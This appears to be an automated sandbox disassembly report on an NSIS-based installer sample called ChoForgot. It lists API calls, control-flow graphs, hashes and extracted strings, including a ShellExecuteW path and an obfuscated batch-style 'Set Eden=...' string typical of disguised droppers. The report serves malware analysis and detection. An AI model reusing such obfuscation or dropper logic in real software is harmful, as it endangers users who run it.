                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                                                        • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                                                        • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                                                        • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                                        • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                                        • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                                                        • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                                        • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,00000000,FellowShoppercomMineralsDangerGifStructures,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,FellowShoppercomMineralsDangerGifStructures,FellowShoppercomMineralsDangerGifStructures,00000000,00000000,FellowShoppercomMineralsDangerGifStructures,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424170,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424170,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424170,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: FellowShoppercomMineralsDangerGifStructures$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                                                                                                                                                                                                                        • API String ID: 4286501637-2555774084
                                                                                                                                                                                                                                                                                                        • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                                        • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                                        • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                                        • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                                        • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                                        • API String ID: 4283519449-527102705

Control-flow Graph (entry block 40337f; graph rendering not reproduced)
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                                        • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00424170,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Set Eden=lLSThinkpad-Reprint-Reid-lUKPh-Hispanic-Anniversary-Savings-Transexual-KejcCases-Walnut-Tommy-SreSAssumed-Presently-LjLos-Services-Costumes-Merit-Bankruptcy-Dj-UEVmEric-Lb-Likelihood-Bdsm-Weighted-Slip-Keno-Reaction-Set Machine=DNiyvEl, xrefs: 004033FD
                                                                                                                                                                                                                                                                                                        • pAB, xrefs: 0040346F, 0040348A, 00403513
                                                                                                                                                                                                                                                                                                        • ... %d%%, xrefs: 004034C8
                                                                                                                                                                                                                                                                                                        • pAB, xrefs: 004033AB
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                                        • String ID: ... %d%%$Set Eden=lLSThinkpad-Reprint-Reid-lUKPh-Hispanic-Anniversary-Savings-Transexual-KejcCases-Walnut-Tommy-SreSAssumed-Presently-LjLos-Services-Costumes-Merit-Bankruptcy-Dj-UEVmEric-Lb-Likelihood-Bdsm-Weighted-Slip-Keno-Reaction-Set Machine=DNiyvEl$pAB$pAB
                                                                                                                                                                                                                                                                                                        • API String ID: 651206458-1376930008

Control-flow Graph (entry block 404f9e; graph rendering not reproduced)
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(00445D80,00424170,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(004034E5,00445D80,00424170,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424170,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424170,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2740478559-0

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f69 GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 745 401f6e-401f7b 732->745 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 751 402387-40238d GlobalFree 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 750 4030e3-4030f2 742->750 745->750 745->751 762 402708-40270e 747->762 751->750 762->750
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(006DB088), ref: 00402387
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FreeGloballstrcpyn
                                                                                                                                                                                                                                                                                                        • String ID: Exch: stack < %d elements$FellowShoppercomMineralsDangerGifStructures$Pop: stack empty
                                                                                                                                                                                                                                                                                                        • API String ID: 1459762280-898558686

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        control_flow_graph 764 402713-40273b call 406035 * 2 769 402746-402749 764->769 770 40273d-402743 call 40145c 764->770 772 402755-402758 769->772 773 40274b-402752 call 40145c 769->773 770->769 776 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 772->776 777 40275a-402761 call 40145c 772->777 773->772 777->776
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • FellowShoppercomMineralsDangerGifStructures, xrefs: 00402770
                                                                                                                                                                                                                                                                                                        • WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
                                                                                                                                                                                                                                                                                                        • <RM>, xrefs: 00402713
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                                                        • String ID: <RM>$FellowShoppercomMineralsDangerGifStructures$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                                                        • API String ID: 247603264-204554071

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        control_flow_graph 785 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 796 402223-4030f2 call 4062cf 785->796 797 40220d-40221b call 4062cf 785->797 797->796
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424170,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424170,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424170,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                                                        • API String ID: 3156913733-2180253247

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        control_flow_graph 805 405eab-405eb7 806 405eb8-405eec GetTickCount GetTempFileNameW 805->806 807 405efb-405efd 806->807 808 405eee-405ef0 806->808 810 405ef5-405ef8 807->810 808->806 809 405ef2 808->809 809->810
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                                        • String ID: nsa
                                                                                                                                                                                                                                                                                                        • API String ID: 1716503409-2209301699

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        control_flow_graph 811 402175-40218b call 401446 * 2 816 402198-40219d 811->816 817 40218d-402197 call 4062cf 811->817 818 4021aa-4021b0 EnableWindow 816->818 819 40219f-4021a5 ShowWindow 816->819 817->816 821 4030e3-4030f2 818->821 819->821
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: HideWindow
                                                                                                                                                                                                                                                                                                        • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 415043291-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3850602802-0
